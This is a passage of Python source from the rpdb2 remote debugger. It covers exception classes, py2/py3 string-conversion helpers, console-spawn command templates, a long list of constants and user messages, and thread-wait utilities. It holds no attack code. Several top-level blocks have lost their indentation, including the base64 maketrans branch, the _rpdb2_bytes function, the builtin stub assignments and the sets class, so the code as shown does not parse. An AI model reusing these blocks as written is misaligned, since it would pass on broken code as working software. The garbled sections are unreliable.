    path can not be encoded with the file system code page. This means that
    the Windows code page is misconfigured.
    """
class NotPythonSource(CException):
    """
    Raised when an attempt is made to load a file that is not Python source.
    """
class InvalidScopeName(CException):
    """
    Invalid scope name.
    Raised when a request is made to set a breakpoint in an unknown scope.
    """
class BadArgument(CException):
    """
    Raised when an argument of an unexpected type or value is passed.
    """
class ThreadNotFound(CException):
    """
    Raised when the requested thread can not be found.
    """
class NoThreads(CException):
    """
    Raised when no threads are available.
    """
class ThreadDone(CException):
    """
    Raised when an operation targets a thread that has already finished.
    """
class DebuggerNotBroken(CException):
    """
    Debugger is not broken.
    Raised when an operation that can only be performed while the debuggee
    is broken is requested while the debuggee is running.
    """
class InvalidFrame(CException):
    """
    Invalid Frame.
    Raised if an operation is requested on a stack frame that does not exist.
    """
class NoExceptionFound(CException):
    """
    No Exception Found.
    Raised when exception information is requested, but no exception is
    found, or has been thrown.
    """
class CConnectionException(CException):
    """
    Base class for exceptions related to client-server communication.
    """
    # The previous explicit __init__ only forwarded *args to the parent
    # constructor, which is what the inherited constructor already does.
class FirewallBlock(CConnectionException):
    """Raised when a firewall is blocking socket communication."""
class BadVersion(CConnectionException):
    """Raised when the peer reports an incompatible version string."""
    def __init__(self, version):
        CConnectionException.__init__(self)
        # m_version: the offending version value, kept for display via __str__.
        self.m_version = version
    def __str__(self):
        return repr(self.m_version)
class UnexpectedData(CConnectionException):
    """Raised when unexpected data is received from the peer."""
class AlreadyAttached(CConnectionException):
    """Raised when attach is attempted while already attached."""
class NotAttached(CConnectionException):
    """Raised when an operation requires an attached debuggee."""
class SpawnUnsupported(CConnectionException):
    """Raised when spawning a debuggee is not supported on this platform."""
class UnknownServer(CConnectionException):
    """Raised when the requested debuggee server can not be found."""
class CSecurityException(CConnectionException):
    """
    Base class for authentication and encryption related exceptions.
    """
    # The previous explicit __init__ only forwarded *args to the parent
    # constructor, which is what the inherited constructor already does.
class UnsetPassword(CSecurityException):
    """Raised when an operation requires a password that has not been set."""
class EncryptionNotSupported(CSecurityException):
    """Raised when encryption is requested but not supported."""
class EncryptionExpected(CSecurityException):
    """Raised when the peer expects an encrypted connection."""
class DecryptionFailure(CSecurityException):
    """Raised when received data can not be decrypted."""
class AuthenticationBadData(CSecurityException):
    """Raised when authentication data is malformed."""
class AuthenticationFailure(CSecurityException):
    """Raised when authentication fails (e.g. wrong password)."""
class AuthenticationBadIndex(CSecurityException):
    """Raised when the authentication message index is out of sync."""
    def __init__(self, max_index = 0, anchor = 0):
        CSecurityException.__init__(self)
        # m_max_index / m_anchor: protocol state returned to the peer so it
        # can resynchronize its message index.
        self.m_max_index = max_index
        self.m_anchor = anchor
    def __str__(self):
        return repr((self.m_max_index, self.m_anchor))
#
#----------------- unicode handling for compatibility with py3k ----------------
#
def is_py3k():
    """Return True when the interpreter is Python 3 or newer."""
    major = sys.version_info[0]
    return major >= 3
def is_unicode(s):
    """
    Return True if s is a text string (unicode on py2, str on py3).

    Restructured so the Python 3 path never evaluates the py2-only
    `unicode` name; the original relied on a module-level `unicode`
    alias existing under Python 3 and performed a needless second check.
    Note: deliberately uses type() equality, not isinstance(), to match
    the original's exact-type semantics.
    """
    if sys.version_info[0] >= 3:
        return type(s) == str
    return type(s) == unicode
def as_unicode(s, encoding = 'utf-8', fstrict = False):
    """
    Return s as a text string; bytes are decoded with *encoding*.
    With fstrict, decoding errors raise; otherwise they are replaced.
    """
    if is_unicode(s):
        return s

    errors = 'strict' if fstrict else 'replace'
    return s.decode(encoding, errors)
def as_string(s, encoding = 'utf-8', fstrict = False):
    """
    Return s as a native `str`: decode bytes on py3, encode unicode on py2.
    With fstrict, conversion errors raise; otherwise they are replaced.
    """
    errors = 'strict' if fstrict else 'replace'

    if is_py3k():
        # On py3 a native string is text; decode anything else.
        if is_unicode(s):
            return s
        return s.decode(encoding, errors)

    # On py2 a native string is bytes; encode unicode input.
    if not is_unicode(s):
        return s
    return s.encode(encoding, errors)
def as_bytes(s, encoding = 'utf-8', fstrict = True):
    """Encode text to bytes; byte strings pass through untouched.

    fstrict: when True (the default), raise on unencodable characters.
    """
    if not is_unicode(s):
        return s
    errors = 'strict' if fstrict else 'replace'
    return s.encode(encoding, errors)
#
#----------------------- Infinite List of Globals ---------------------------
#
#
# According to PEP-8: "Use 4 spaces per indentation level."
#
PYTHON_TAB_WIDTH = 4
GNOME_DEFAULT_TERM = 'gnome-terminal'
NT_DEBUG = 'nt_debug'
SCREEN = 'screen'
MAC = 'mac'
DARWIN = 'darwin'
POSIX = 'posix'
#
# Map between OS type and relevant command to initiate a new OS console.
# entries for other OSs can be added here.
# '%s' serves as a placeholder.
#
# Currently there is no difference between 'nt' and NT_DEBUG, since now
# both of them leave the terminal open after termination of debuggee to
# accommodate scenarios of scripts with child processes.
#
osSpawn = {
'nt': 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
NT_DEBUG: 'start "rpdb2 - Version ' + get_version() + ' - Debuggee Console" cmd.exe /K ""%(exec)s" %(options)s"',
POSIX: "%(term)s -e %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
'Terminal': "Terminal --disable-server -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
GNOME_DEFAULT_TERM: "gnome-terminal --disable-factory -x %(shell)s -c '%(exec)s %(options)s; %(shell)s' &",
MAC: '%(exec)s %(options)s',
DARWIN: '%(exec)s %(options)s',
SCREEN: 'screen -t debuggee_console %(exec)s %(options)s'
}
RPDBTERM = 'RPDBTERM'
COLORTERM = 'COLORTERM'
TERM = 'TERM'
KDE_PREFIX = 'KDE'
GNOME_PREFIX = 'GNOME'
KDE_DEFAULT_TERM_QUERY = "kreadconfig --file kdeglobals --group General --key TerminalApplication --default konsole"
XTERM = 'xterm'
RXVT = 'rxvt'
RPDB_SETTINGS_FOLDER = '.rpdb2_settings'
RPDB_PWD_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'passwords')
RPDB_BPL_FOLDER = os.path.join(RPDB_SETTINGS_FOLDER, 'breakpoints')
RPDB_BPL_FOLDER_NT = 'rpdb2_breakpoints'
MAX_BPL_FILES = 100
EMBEDDED_SYNC_THRESHOLD = 1.0
EMBEDDED_SYNC_TIMEOUT = 5.0
HEARTBEAT_TIMEOUT = 16
IDLE_MAX_RATE = 2.0
PING_TIMEOUT = 4.0
LOCAL_TIMEOUT = 1.0
COMMUNICATION_RETRIES = 5
WAIT_FOR_BREAK_TIMEOUT = 3.0
SHUTDOWN_TIMEOUT = 4.0
STARTUP_TIMEOUT = 3.0
STARTUP_RETRIES = 3
LOOPBACK = '127.0.0.1'
LOCALHOST = 'localhost'
SERVER_PORT_RANGE_START = 51000
SERVER_PORT_RANGE_LENGTH = 24
SOURCE_EVENT_CALL = 'C'
SOURCE_EVENT_LINE = 'L'
SOURCE_EVENT_RETURN = 'R'
SOURCE_EVENT_EXCEPTION = 'E'
SOURCE_STATE_UNBROKEN = '*'
SOURCE_BP_ENABLED = 'B'
SOURCE_BP_DISABLED = 'D'
SYMBOL_MARKER = '>'
SYMBOL_ALL = '*'
SOURCE_MORE = '+'
SOURCE_LESS = '-'
SOURCE_ENTIRE_FILE = '^'
CONSOLE_PRINTER = '*** '
CONSOLE_WRAP_INDEX = 78
CONSOLE_PROMPT = '\n> '
# Console prompt shown in analyze mode (typo "Analayze" fixed).
CONSOLE_PROMPT_ANALYZE = '\nAnalyze> '
CONSOLE_INTRO = ("""RPDB2 - The Remote Python Debugger, version %s,
Copyright (C) 2005-2009 Nir Aides.
Type "help", "copyright", "license", "credits" for more information.""" % (RPDB_VERSION))
PRINT_NOTICE_PROMPT = "Hit Return for more, or q (and Return) to quit:"
PRINT_NOTICE_LINES_PER_SECTION = 20
STR_NO_THREADS = "Operation failed since no traced threads were found."
STR_STARTUP_NOTICE = "Attaching to debuggee..."
STR_SPAWN_UNSUPPORTED = "The debugger does not know how to open a new console on this system. You can start the debuggee manually with the -d flag on a separate console and then use the 'attach' command to attach to it."
STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX = """Alternatively, you can use the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_AUTOMATIC_LAUNCH_UNKNOWN = STR_SPAWN_UNSUPPORTED
STR_STARTUP_SPAWN_NOTICE = "Starting debuggee..."
STR_KILL_NOTICE = "Stopping debuggee..."
STR_STARTUP_FAILURE = "Debuggee failed to start in a timely manner."
STR_OUTPUT_WARNING = "Textual output will be done at the debuggee."
STR_OUTPUT_WARNING_ASYNC = "The operation will continue to run in the background."
STR_ANALYZE_GLOBALS_WARNING = "In analyze mode the globals and locals dictionaries are read only."
STR_BREAKPOINTS_LOADED = "Breakpoints were loaded."
STR_BREAKPOINTS_SAVED = "Breakpoints were saved."
STR_BREAKPOINTS_SAVE_PROBLEM = "A problem occurred while saving the breakpoints."
STR_BREAKPOINTS_LOAD_PROBLEM = "A problem occurred while loading the breakpoints."
STR_BREAKPOINTS_NOT_SAVED = "Breakpoints were not saved."
STR_BREAKPOINTS_NOT_LOADED = "Breakpoints were not loaded."
STR_BREAKPOINTS_FILE_NOT_FOUND = "Breakpoints file was not found."
STR_BREAKPOINTS_NOT_FOUND = "No Breakpoints were found."
STR_BAD_FILENAME = "Bad File Name."
STR_SOME_BREAKPOINTS_NOT_LOADED = "Some breakpoints were not loaded, because of an error."
STR_BAD_EXPRESSION = "Bad expression '%s'."
STR_FILE_NOT_FOUND = "File '%s' not found."
STR_DISPLAY_ERROR = """If the X server (Windowing system) is not started you need to use rpdb2 with the screen utility and invoke rpdb2 in screen mode with the -s command-line flag as follows:
screen rpdb2 -s some-script.py script-arg1 script-arg2..."""
STR_EXCEPTION_NOT_FOUND = "No exception was found."
STR_SCOPE_NOT_FOUND = "Scope '%s' not found."
STR_NO_SUCH_BREAKPOINT = "Breakpoint not found."
STR_THREAD_NOT_FOUND = "Thread was not found."
STR_NO_THREADS_FOUND = "No threads were found."
STR_THREAD_NOT_BROKEN = "Thread is running."
STR_THREAD_FOCUS_SET = "Focus was set to chosen thread."
STR_ILEGAL_ANALYZE_MODE_ARG = "Argument is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ILEGAL_ANALYZE_MODE_CMD = "Command is not allowed in analyze mode. Type 'help analyze' for more info."
STR_ANALYZE_MODE_TOGGLE = "Analyze mode was set to: %s."
STR_BAD_ARGUMENT = "Bad Argument."
STR_BAD_SYNTAX = 'Unknown syntax: %s\nDid you forget to use the exec or eval console commands?'
STR_PSYCO_WARNING = "The psyco module was detected. The debugger is incompatible with the psyco module and will not function correctly as long as the psyco module is imported and used."
STR_CONFLICTING_MODULES = "The modules: %s, which are incompatible with the debugger were detected and can possibly cause the debugger to fail."
STR_SIGNAL_INTERCEPT = "The signal %s(%d) was intercepted inside debugger tracing logic. It will be held pending until the debugger continues. Any exceptions raised by the handler will be ignored!"
STR_SIGNAL_EXCEPTION = "Exception %s raised by handler of signal %s(%d) inside debugger tracing logic was ignored!"
STR_DEBUGGEE_TERMINATED = "Debuggee has terminated."
STR_DEBUGGEE_NOT_BROKEN = "Debuggee has to be waiting at break point to complete this command."
STR_DEBUGGER_HAS_BROKEN = "Debuggee is waiting at break point for further commands."
STR_ALREADY_ATTACHED = "Already attached. Detach from debuggee and try again."
STR_NOT_ATTACHED = "Not attached to any script. Attach to a script and try again."
STR_COMMUNICATION_FAILURE = "Failed to communicate with debugged script."
STR_ERROR_OTHER = "Command returned the following error:\n%(type)s, %(value)s.\nPlease check stderr for stack trace and report to support."
STR_BAD_MBCS_PATH = "The debugger can not launch the script since the path to the Python executable or the debugger scripts can not be encoded into the default system code page. Please check the settings of 'Language for non-Unicode programs' in the Advanced tab of the Windows Regional and Language Options dialog."
STR_LOST_CONNECTION = "Lost connection to debuggee."
# User-facing firewall diagnostic (typo "chanel" fixed).
STR_FIREWALL_BLOCK = "A firewall is blocking the local communication channel (socket) that is required between the debugger and the debugged script. Please make sure that the firewall allows that communication."
STR_BAD_VERSION = "A debuggee was found with incompatible debugger version %(value)s."
STR_BAD_VERSION2 = "While attempting to find the specified debuggee at least one debuggee was found that uses incompatible version of RPDB2."
STR_UNEXPECTED_DATA = "Unexpected data received."
STR_ACCESS_DENIED = "While attempting to find debuggee, at least one debuggee denied connection because of mismatched passwords. Please verify your password."
STR_ACCESS_DENIED2 = "Communication is denied because of un-matching passwords."
STR_ENCRYPTION_EXPECTED = "While attempting to find debuggee, at least one debuggee denied connection since it accepts encrypted connections only."
STR_ENCRYPTION_EXPECTED2 = "Debuggee will only talk over an encrypted channel."
STR_DECRYPTION_FAILURE = "Bad packet was received by the debuggee."
STR_DEBUGGEE_NO_ENCRYPTION = "Debuggee does not support encrypted mode. Either install the python-crypto package on the debuggee machine or allow unencrypted connections."
STR_RANDOM_PASSWORD = "Password has been set to a random password."
STR_PASSWORD_INPUT = "Please type a password:"
STR_PASSWORD_CONFIRM = "Password has been set."
STR_PASSWORD_NOT_SUPPORTED = "The --pwd flag is only supported on NT systems."
STR_PASSWORD_MUST_BE_SET = "A password should be set to secure debugger client-server communication."
STR_BAD_DATA = "Bad data received from debuggee."
STR_BAD_FILE_DATA = "Bad data received from file."
STR_ATTACH_FAILED = "Failed to attach"
STR_ATTACH_FAILED_NAME = "Failed to attach to '%s'."
STR_ATTACH_CRYPTO_MODE = "Debug Channel is%s encrypted."
STR_ATTACH_CRYPTO_MODE_NOT = "NOT"
STR_ATTACH_SUCCEEDED = "Successfully attached to '%s'."
STR_ATTEMPTING_TO_STOP = "Requesting script to stop."
STR_ATTEMPTING_TO_DETACH = "Detaching from script..."
STR_DETACH_SUCCEEDED = "Detached from script."
STR_DEBUGGEE_UNKNOWN = "Failed to find script."
STR_MULTIPLE_DEBUGGEES = "WARNING: There is more than one debuggee '%s'."
MSG_ERROR_HOST_TEXT = """The debugger was not able to set the host to '%s'.
The following error was returned:
%s"""
STR_SOURCE_NOT_FOUND = "Failed to get source from debuggee."
STR_SCRIPTS_CONNECTING = "Connecting to '%s'..."
STR_SCRIPTS_NO_SCRIPTS = "No scripts to debug on '%s'"
STR_SCRIPTS_TO_DEBUG = """Scripts to debug on '%s':
pid name
--------------------------"""
STR_STACK_TRACE = """Stack trace for thread %d:
Frame File Name Line Function
------------------------------------------------------------------------------"""
STR_SOURCE_LINES = """Source lines for thread %d from file '%s':
"""
STR_ACTIVE_THREADS = """List of active threads known to the debugger:
No Tid Name State
-----------------------------------------------"""
STR_BREAKPOINTS_LIST = """List of breakpoints:
Id State Line Filename-Scope-Condition-Encoding
------------------------------------------------------------------------------"""
STR_BREAKPOINTS_TEMPLATE = """ %2d %-8s %5d %s
%s
%s
%s"""
STR_ENCRYPTION_SUPPORT_ERROR = "Encryption is not supported since the python-crypto package was not found. Either install the python-crypto package or allow unencrypted connections."
STR_PASSWORD_NOT_SET = 'Password is not set.'
STR_PASSWORD_SET = 'Password is set to: "%s"'
STR_PASSWORD_BAD = 'The password should begin with a letter and continue with any combination of digits, letters or underscores (\'_\'). Only English characters are accepted for letters.'
STR_ENCRYPT_MODE = 'Force encryption mode: %s'
STR_REMOTE_MODE = 'Allow remote machines mode: %s'
STR_ENCODING_MODE = 'Encoding is set to: %s'
STR_ENCODING_MODE_SET = 'Encoding was set to: %s'
STR_ENCODING_BAD = 'The specified encoding was not recognized by the debugger.'
STR_ENVIRONMENT = 'The current environment mapping is:'
STR_ENVIRONMENT_EMPTY = 'The current environment mapping is not set.'
STR_SYNCHRONICITY_BAD = "Can not process command when thread is running unless synchronicity mode is turned on. Type 'help synchro' at the command prompt for more information."
STR_SYNCHRONICITY_MODE = 'The synchronicity mode is set to: %s'
STR_TRAP_MODE = 'Trap unhandled exceptions mode is set to: %s'
STR_TRAP_MODE_SET = "Trap unhandled exceptions mode was set to: %s."
STR_FORK_MODE = "Fork mode is set to: %s, %s."
STR_FORK_MODE_SET = "Fork mode was set to: %s, %s."
STR_LOCAL_NAMESPACE_WARNING = 'Debugger modifications to the original bindings of the local namespace of this frame will be committed before the execution of the next statement of the frame. Any code using these variables executed before that point will see the original values.'
STR_WARNING = 'Warning: %s'
STR_MAX_NAMESPACE_WARNING_TITLE = 'Namespace Warning'
STR_MAX_NAMESPACE_WARNING_TYPE = '*** WARNING ***'
STR_MAX_NAMESPACE_WARNING_MSG = 'Number of items exceeds capacity of namespace browser.'
# Warning shown when evaluate output is clipped (typo "exeeds" fixed).
STR_MAX_EVALUATE_LENGTH_WARNING = 'Output length exceeds maximum capacity.'
FORK_CHILD = 'child'
FORK_PARENT = 'parent'
FORK_MANUAL = 'manual'
FORK_AUTO = 'auto'
ENCRYPTION_ENABLED = 'encrypted'
ENCRYPTION_DISABLED = 'plain-text'
STATE_ENABLED = 'enabled'
STATE_DISABLED = 'disabled'
BREAKPOINTS_FILE_EXT = '.bpl'
PYTHON_FILE_EXTENSION = '.py'
PYTHONW_FILE_EXTENSION = '.pyw'
PYTHONW_SO_EXTENSION = '.so'
PYTHON_EXT_LIST = ['.py', '.pyw', '.pyc', '.pyd', '.pyo', '.so']
MODULE_SCOPE = '?'
MODULE_SCOPE2 = '<module>'
BLENDER_SOURCE_NOT_AVAILABLE = as_unicode('Blender script source code is not available.')
SOURCE_NOT_AVAILABLE = as_unicode('Source code is not available.')
SCOPE_SEP = '.'
BP_FILENAME_SEP = ':'
BP_EVAL_SEP = ','
DEBUGGER_FILENAME = 'rpdb2.py'
THREADING_FILENAME = 'threading.py'
STR_STATE_BROKEN = 'waiting at break point'
STATE_BROKEN = 'broken'
STATE_RUNNING = 'running'
STATE_ANALYZE = 'analyze'
STATE_DETACHED = 'detached'
STATE_DETACHING = 'detaching'
STATE_SPAWNING = 'spawning'
STATE_ATTACHING = 'attaching'
DEFAULT_NUMBER_OF_LINES = 20
DICT_KEY_TID = 'tid'
DICT_KEY_STACK = 'stack'
DICT_KEY_CODE_LIST = 'code_list'
DICT_KEY_CURRENT_TID = 'current tid'
DICT_KEY_BROKEN = 'broken'
DICT_KEY_BREAKPOINTS = 'breakpoints'
DICT_KEY_LINES = 'lines'
DICT_KEY_FILENAME = 'filename'
DICT_KEY_FIRST_LINENO = 'first_lineno'
DICT_KEY_FRAME_LINENO = 'frame_lineno'
DICT_KEY_EVENT = 'event'
DICT_KEY_EXPR = 'expr'
DICT_KEY_NAME = 'name'
DICT_KEY_REPR = 'repr'
DICT_KEY_IS_VALID = 'fvalid'
DICT_KEY_TYPE = 'type'
DICT_KEY_SUBNODES = 'subnodes'
DICT_KEY_N_SUBNODES = 'n_subnodes'
DICT_KEY_ERROR = 'error'
RPDB_EXEC_INFO = as_unicode('rpdb_exception_info')
MODE_ON = 'ON'
MODE_OFF = 'OFF'
ENCODING_UTF8_PREFIX_1 = '\xef\xbb\xbf'
ENCODING_SOURCE = '# -*- coding: %s -*-\n'
ENCODING_AUTO = as_unicode('auto')
ENCODING_RAW = as_unicode('raw')
ENCODING_RAW_I = as_unicode('__raw')
MAX_EVALUATE_LENGTH = 256 * 1024
MAX_NAMESPACE_ITEMS = 1024
MAX_SORTABLE_LENGTH = 256 * 1024
REPR_ID_LENGTH = 4096
MAX_NAMESPACE_WARNING = {
DICT_KEY_EXPR: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_NAME: STR_MAX_NAMESPACE_WARNING_TITLE,
DICT_KEY_REPR: STR_MAX_NAMESPACE_WARNING_MSG,
DICT_KEY_IS_VALID: False,
DICT_KEY_TYPE: STR_MAX_NAMESPACE_WARNING_TYPE,
DICT_KEY_N_SUBNODES: 0
}
MAX_EVENT_LIST_LENGTH = 1000
EVENT_EXCLUDE = 'exclude'
EVENT_INCLUDE = 'include'
INDEX_TABLE_SIZE = 100
DISPACHER_METHOD = 'dispatcher_method'
CONFLICTING_MODULES = ['psyco', 'pdb', 'bdb', 'doctest']
XML_DATA = """<?xml version='1.0'?>
<methodCall>
<methodName>dispatcher_method</methodName>
<params>
<param>
<value><string>%s</string></value>
</param>
</params>
</methodCall>""" % RPDB_COMPATIBILITY_VERSION
N_WORK_QUEUE_THREADS = 8
DEFAULT_PATH_SUFFIX_LENGTH = 55
ELLIPSIS_UNICODE = as_unicode('...')
ELLIPSIS_BYTES = as_bytes('...')
ERROR_NO_ATTRIBUTE = 'Error: No attribute.'
g_server_lock = threading.RLock()
g_server = None
g_debugger = None
g_fScreen = False
g_fDefaultStd = True
#
# In debug mode errors and tracebacks are printed to stdout
#
g_fDebug = False
#
# Lock for the traceback module to prevent it from interleaving
# output from different threads.
#
g_traceback_lock = threading.RLock()
g_source_provider_aux = None
g_lines_cache = {}
g_initial_cwd = []
g_error_mapping = {
socket.error: STR_COMMUNICATION_FAILURE,
CConnectionException: STR_LOST_CONNECTION,
FirewallBlock: STR_FIREWALL_BLOCK,
BadVersion: STR_BAD_VERSION,
UnexpectedData: STR_UNEXPECTED_DATA,
SpawnUnsupported: STR_SPAWN_UNSUPPORTED,
UnknownServer: STR_DEBUGGEE_UNKNOWN,
UnsetPassword: STR_PASSWORD_MUST_BE_SET,
EncryptionNotSupported: STR_DEBUGGEE_NO_ENCRYPTION,
EncryptionExpected: STR_ENCRYPTION_EXPECTED,
DecryptionFailure: STR_DECRYPTION_FAILURE,
AuthenticationBadData: STR_ACCESS_DENIED,
AuthenticationFailure: STR_ACCESS_DENIED,
BadMBCSPath: STR_BAD_MBCS_PATH,
AlreadyAttached: STR_ALREADY_ATTACHED,
NotAttached: STR_NOT_ATTACHED,
DebuggerNotBroken: STR_DEBUGGEE_NOT_BROKEN,
NoThreads: STR_NO_THREADS,
NoExceptionFound: STR_EXCEPTION_NOT_FOUND,
}
#
# These globals are related to handling the os.fork() os._exit() and exec
# pattern.
#
g_forkpid = None
g_forktid = None
g_fignorefork = False
g_exectid = None
g_execpid = None
g_fos_exit = False
#
# To hold a reference to __main__ to prevent its release if an unhandled
# exception is raised.
#
g_module_main = None
g_found_conflicting_modules = []
g_fignore_atexit = False
g_ignore_broken_pipe = 0
#
# Unicode version of path names that do not encode well with the Windows
# 'mbcs' encoding. This dict is used to work with such path names on
# windows.
#
g_found_unicode_files = {}
g_frames_path = {}
g_signal_handlers = {}
g_signals_pending = []
#g_profile = None
g_fFirewallTest = True
if is_py3k():
g_safe_base64_to = bytes.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = bytes.maketrans(as_bytes('_-#'), as_bytes('/+='))
else:
g_safe_base64_to = string.maketrans(as_bytes('/+='), as_bytes('_-#'))
g_safe_base64_from = string.maketrans(as_bytes('_-#'), as_bytes('/+='))
g_alertable_waiters = {}
g_builtins_module = sys.modules.get('__builtin__', sys.modules.get('builtins'))
#
# ---------------------------- General Utils ------------------------------
#
def job_wrapper(event, foo, *args, **kwargs):
    """Invoke *foo* with the given arguments, signalling *event* when done.

    The event is set even when foo raises, so waiters are always released;
    the exception itself propagates to the caller.
    """
    try:
        foo(*args, **kwargs)
    finally:
        event.set()
def send_job(tid, timeout, foo, *args, **kwargs):
    """Queue *foo* for execution on thread *tid* and wait for completion.

    Raises KeyError when thread *tid* is not registered as an alertable
    waiter (i.e. not currently available for jobs).
    """
    lock, jobs = g_alertable_waiters[tid]
    done = threading.Event()
    jobs.append(lambda: job_wrapper(done, foo, *args, **kwargs))
    try:
        lock.acquire()
        lock_notify_all(lock)
    finally:
        lock.release()
    safe_wait(done, timeout)
def alertable_wait(lock, timeout = None):
    """Wait on *lock* while remaining responsive to jobs queued by peers.

    While registered in g_alertable_waiters, other threads may append
    callables for this thread; they are executed here after the wait
    returns. Exceptions raised by jobs are swallowed.
    """
    pending = []
    tid = thread.get_ident()
    g_alertable_waiters[tid] = (lock, pending)
    try:
        safe_wait(lock, timeout)
        while pending:
            job = pending.pop(0)
            try:
                job()
            except:
                pass
            if not pending:
                # Grace period: give a notifier that just woke us a chance
                # to queue one more job before we deregister.
                time.sleep(0.1)
    finally:
        del g_alertable_waiters[tid]
def safe_wait(lock, timeout = None):
    """lock.wait() wrapper that survives spurious exceptions.

    Works around a Windows quirk where signal handlers may raise even
    when they return normally: the remaining timeout is recomputed and
    the wait retried until it completes or the budget runs out.
    """
    while True:
        started = time.time()
        try:
            return lock.wait(timeout)
        except:
            if timeout is None:
                continue
            timeout -= time.time() - started
            if timeout <= 0:
                return
#
# The following code is related to the ability of the debugger
# to work both on Python 2.5 and 3.0.
#
def lock_notify_all(lock):
    """Wake all waiters on *lock*, tolerating the pre-2.6 API name."""
    if is_py3k():
        try:
            return lock.notify_all()
        except AttributeError:
            pass
    return lock.notifyAll()
def event_is_set(event):
    """event.is_set(), falling back to the pre-2.6 isSet() name."""
    if is_py3k():
        try:
            return event.is_set()
        except AttributeError:
            pass
    return event.isSet()
def thread_set_daemon(thread, fdaemon):
    """Set a thread's daemon flag across old and new threading APIs."""
    if is_py3k():
        try:
            return thread.set_daemon(fdaemon)
        except AttributeError:
            pass
    return thread.setDaemon(fdaemon)
def thread_is_alive(thread):
    """thread.is_alive(), falling back to the pre-2.6 isAlive() name."""
    if is_py3k():
        try:
            return thread.is_alive()
        except AttributeError:
            pass
    return thread.isAlive()
def thread_set_name(thread, name):
    """Set a thread's name across old and new threading APIs."""
    if is_py3k():
        try:
            return thread.set_name(name)
        except AttributeError:
            pass
    return thread.setName(name)
def thread_get_name(thread):
    """Get a thread's name across old and new threading APIs."""
    if is_py3k():
        try:
            return thread.get_name()
        except AttributeError:
            pass
    return thread.getName()
def current_thread():
    """threading.current_thread(), falling back to currentThread()."""
    if is_py3k():
        try:
            return threading.current_thread()
        except AttributeError:
            pass
    return threading.currentThread()
class _stub_type:
    # Stand-in for builtin types (unicode, long, str8, bytearray, bytes)
    # that do not exist on the running interpreter; type checks against
    # it then simply never match.
    pass
def _rpdb2_bytes(s, e):
return s.encode(e)
if not hasattr(g_builtins_module, 'unicode'):
unicode = _stub_type
if not hasattr(g_builtins_module, 'long'):
long = _stub_type
if not hasattr(g_builtins_module, 'str8'):
str8 = _stub_type
if not hasattr(g_builtins_module, 'bytearray'):
bytearray = _stub_type
if not hasattr(g_builtins_module, 'bytes'):
bytes = _stub_type
#
# Pickle on Python 2.5 should know how to handle byte strings
# that arrive from Python 3.0 over sockets.
#
g_builtins_module.bytes = _rpdb2_bytes
if is_py3k():
class sets:
Set = _stub_type
BaseSet = _stub_type
ImmutableSet = _stub_type
if sys.version_info[:2] <= (2, 3):
set = sets.Set
def _raw_input(s):
    """Prompt with *s* and return the user's reply as a unicode string."""
    if is_py3k():
        return input(s)
    reply = raw_input(s)
    return as_unicode(reply, detect_encoding(sys.stdin), fstrict = True)
def _print(s, f = sys.stdout, feol = True):
    """Write *s* to file *f*, re-encoded to the file's own encoding.

    Characters the target encoding cannot represent are replaced rather
    than raising. feol: append a newline when True.
    """
    encoding = detect_encoding(f)
    text = as_unicode(s)
    raw = as_bytes(text, encoding, fstrict = False)
    out = as_string(raw, encoding)
    if feol:
        out += '\n'
    f.write(out)
def detect_encoding(file):
    """Best-effort detection of the encoding used by file object *file*.

    Falls back to the locale encoding when the file has no usable
    encoding attribute, to 'utf-8' for unknown utf_8 variants, and to
    'ascii' otherwise.
    """
    try:
        encoding = file.encoding
        if encoding == None:
            return detect_locale()
    except:
        return detect_locale()
    try:
        codecs.lookup(encoding)
        return encoding
    except:
        pass
    if encoding.lower().startswith('utf_8'):
        return 'utf-8'
    return 'ascii'
def detect_locale():
    """Return a usable name for the default locale encoding.

    Unknown encodings degrade to 'utf-8' (for utf_8 variants) or 'ascii'.
    """
    encoding = locale.getdefaultlocale()[1]
    if encoding is None:
        return 'ascii'
    try:
        codecs.lookup(encoding)
        return encoding
    except:
        pass
    if encoding.lower().startswith('utf_8'):
        return 'utf-8'
    return 'ascii'
def class_name(c):
    """Return the dotted name portion of str(c), asserting it is local."""
    text = safe_str(c)
    if "'" in text:
        text = text.split("'")[1]
    assert(text.startswith(__name__ + '.'))
    return text
def clip_filename(path, n = DEFAULT_PATH_SUFFIX_LENGTH):
    """Return a tail of *path* at most ~n characters, clipped at a separator."""
    suffix = calc_suffix(path, n)
    if not suffix.startswith('...'):
        return suffix
    sep_index = suffix.find(os.sep)
    if sep_index == -1:
        return suffix
    return '...' + suffix[sep_index:]
def safe_str(x):
    """Return str(x); objects whose __str__ raises yield 'N/A'."""
    try:
        result = str(x)
    except:
        result = 'N/A'
    return result
def safe_repr(x):
    """Return repr(x); objects whose __repr__ raises yield 'N/A'."""
    try:
        result = repr(x)
    except:
        result = 'N/A'
    return result
def parse_type(t):
    """Extract a type's name from its repr, e.g. "<class 'int'>" -> 'int'."""
    rt = safe_repr(t)
    if "'" not in rt:
        return rt
    return rt.split("'")[1]
def repr_list(pattern, l, length, encoding, is_valid):
    """Render iterable *l* through *pattern* (e.g. '[%s]'), length-limited.

    pattern:  '%s'-style wrapper such as '[%s]', '(%s)' or 'set([%s])'.
    length:   approximate output budget.
    encoding: forwarded to repr_ltd() for string elements.
    is_valid: single-element list; is_valid[0] is cleared on truncation
              or when the iterable could not be fully rendered.
    """
    # Reserve room for the pattern's own decoration (all but the '%s').
    length = max(0, length - len(pattern) + 2)
    s = ''
    index = 0
    try:
        for i in l:
            #
            # Remove any trace of session password from data structures that
            # go over the network.
            #
            if type(i) == str and i in ['_rpdb2_args', '_rpdb2_pwd', 'm_rpdb2_pwd']:
                continue
            s += repr_ltd(i, length - len(s), encoding, is_valid)
            index += 1
            if index < len(l) and len(s) > length:
                is_valid[0] = False
                if not s.endswith('...'):
                    s += '...'
                break
            # Separator between elements; the second clause also appends
            # ', ' after a lone tuple element so it renders tuple-style.
            if index < len(l) or (index == 1 and pattern[0] == '('):
                s += ', '
    except AttributeError:
        # Presumably raised by exotic iterables lacking expected
